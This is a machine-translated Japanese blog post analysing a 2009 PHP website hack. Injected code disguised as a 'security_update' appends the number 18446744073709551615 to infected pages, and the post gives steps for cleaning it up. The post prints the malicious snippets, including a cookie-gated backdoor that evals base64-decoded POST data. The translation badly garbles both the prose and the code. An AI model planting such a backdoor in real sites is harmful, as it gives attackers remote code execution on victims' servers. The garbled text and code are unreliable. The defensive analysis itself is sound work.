最近では私は明らかに悪意のあるアクションのハッキングの例で増加を参照して、被害者のホームページの末尾を表示して、番号を"18446744073709551615"。
ネットワークを使用して記事の多くを見つける検索キー/には、この最大数はPHP内のフィールドはBIGINTに使用されている記事としては、この番号を使って検索する。 このクレイジーな機能のために計算を実行するサイト内で探して行くには疑いを持たないユーザーがつながるとは、この番号の出現につながる。 これらはすべて無駄になります!
実際には、この番号とページ"index.phpをあなたのサイトの"ページが表示されますそこには 、 件名には 、 ページ番号の下部に表示されるページの動作は変更されませんは、次の関数を挿入することによってハッキングされています。
改正されたページには、次のコードで表示されます:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | "?ペソ "security_update" ) ; //do not remove this line - important security update! の ob_start("")/ security_update /この行を削除しないでください-重要なセキュリティ更新プログラム! "---コードギアスオリジナルページ---" ?" "?ペソ $buffer ) security_update 関数 ($バッファ) ( '18446744073709551615' ; $'= '18446744073709551615 更新 ; stristr ( $buffer , '</html' ) !== FALSE ) (stristr($ の場合 、 バッファ、'"/ html'と)!== FALSE)を ( ( '</html' , $update . '<html' , $buffer ) ; 戻り eregi_replace('"/ html'に、$ を更新します。'"html' に、$ バッファ); ) その他の ( . $update ; $ バッファを 返す 。$更新; ) ) ?" |
の場合は、"security_update"を分析することで、コードを参照することができますあなたのページからバッファにコピーして、すべての出力を入れていないバッファの値を"18446744073709551615に追加"。
が発生する問題です: なぜですか?
私は、このハックの進化に目を光らせています、まだそのような行動の理由を確認していません。 は、現在最も真実は、"マーカー"サイト"に感染した"としてので、簡単にネット上で任意の検索で見つけることができます使用しているように見える仮説。
いったい誰がこのハッキングは今のためにあなたの書き込みを許可セキュリティ上の欠陥を知り、彼らの犠牲者やサイトを識別することは約束され、その数は"18446744073709551615"。
ここ数週間の動向を見て何をされているのは 、 スクリプトの'進化を見ているが、実際には被害者に損害を与えることができる新しい行を追加しました。 その新しいバージョンでは、このコード:
1 2 3 | "?ペソ "security_update" ) ; //do not remove this line - important security update! の ob_start("")/ security_update /この行を削除しないでください-重要なセキュリティ更新プログラム! md5 ( $_COOKIE [ '73043475c0893e30' ] ) == "59fdd20854f4a2056c082cab53e64860" ) { eval ( base64_decode ( $_POST [ 'file' ] ) ) ; exit ; } ?> < ?php (md5は ($ _COOKIEの ['73043475c0893e30'])=="59fdd20854f4a2056c082cab53e64860") 場合に する(eval(base64_decode($ _POST [''])); 終了 ファイル ;)"?PHPの |
このスクリプトではクッキーは、ときに($ _COOKIEの['73043475c0893e30 '])==" 59fdd20854f4a2056c082cab53e64860")が発生したにチェック以上が暗号化されたファイルをPOSTによって送信された復号化を実行します。
ハッカーは、能力が以前に"ブランド"が感染したすべてのドメインにファイルを送信する必要がありますこの方法では。
今は、私は()"しかし、もちろん、それは当然のことだが、スクリプトとその進化のアクションのいくつかの手順を実行するために感染したサイトの数を高めるためのものだと思うには、この機能は"security_update利用している具体的な行動を見ていないさらに質量の攻撃。
削除する方法?
だけですべてのページは、"番号"18446744073709551615を見るには、この上記のようにハックのコードのクリーンアップを検索削除してください。
再度"PoweGrep"私たちへあなたのサイト上のすべてのファイルには、文字列"18446744073709551615"を検索することができます(ローカル)快適です。
一度識別、ページは、ページの上部からこれらの行が削除されます:
1 2 3 | "?ペソ "security_update" ) ; //do not remove this line - important security update! の ob_start("")/ security_update /この行を削除しないでください-重要なセキュリティ更新プログラム! md5 ( $_COOKIE [ '73043475c0893e30' ] ) == "59fdd20854f4a2056c082cab53e64860" ) { eval ( base64_decode ( $_POST [ 'file' ] ) ) ; exit ; } ?> (md5は ($ _COOKIEの ['73043475c0893e30'])=="59fdd20854f4a2056c082cab53e64860") 場合に する(eval(base64_decode($ _POST [''])); 終了 ファイル ;)?" |
(行3すべてのバージョン)が存在しない場合
これらの端から再生:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | "?ペソ $buffer ) security_update 関数 ($バッファ) ( '18446744073709551615' ; $'= '18446744073709551615 更新 ; stristr ( $buffer , '</html' ) !== FALSE ) (stristr($ の場合 、 バッファ、'"/ html'と)!== FALSE)を ( ( '</html' , $update . '<html' , $buffer ) ; 戻り eregi_replace('"/ html'に、$ を更新します。'"html' に、$ バッファ); ) その他の ( . $update ; $ バッファを 返す 。$更新; ) ) ?" |
感染の可能性
私は、今のところ決定した場合は、感染症は、Webアプリケーションの脆弱性により、または行われるかどうかは、FTP経由で、あなたのFTPクライアントの資格情報を使用しています。
両方のケースでは、アドバイスは、常に同じであり、彼らはいつもうまくいく:
1)安全な施設でSecuniaのとをSecurityFocusまたはMilw0rmなどは、アプリケーション/スクリプト/ CMSでは、任意の新たな脆弱性を確認します。
2) ソフトウェアのマルウェア対策、スパイウェアなどと 、 自分のPCの実行定期的にフルスキャンします。 特に、Malwarebytes'反マルウェアはすべて、これらの保護の単一のソリューションに含まれて使用することをお勧め
このことについての情報を誰でも、それらは私にcapn3m0@capn3m0.orgに書き込む共有したいと思った
更新8 / 2009分の 11:]ハック[ - security_updateを再定義することはできません()は、最後はここです!
読み込んでいます...
読み込んでいます...
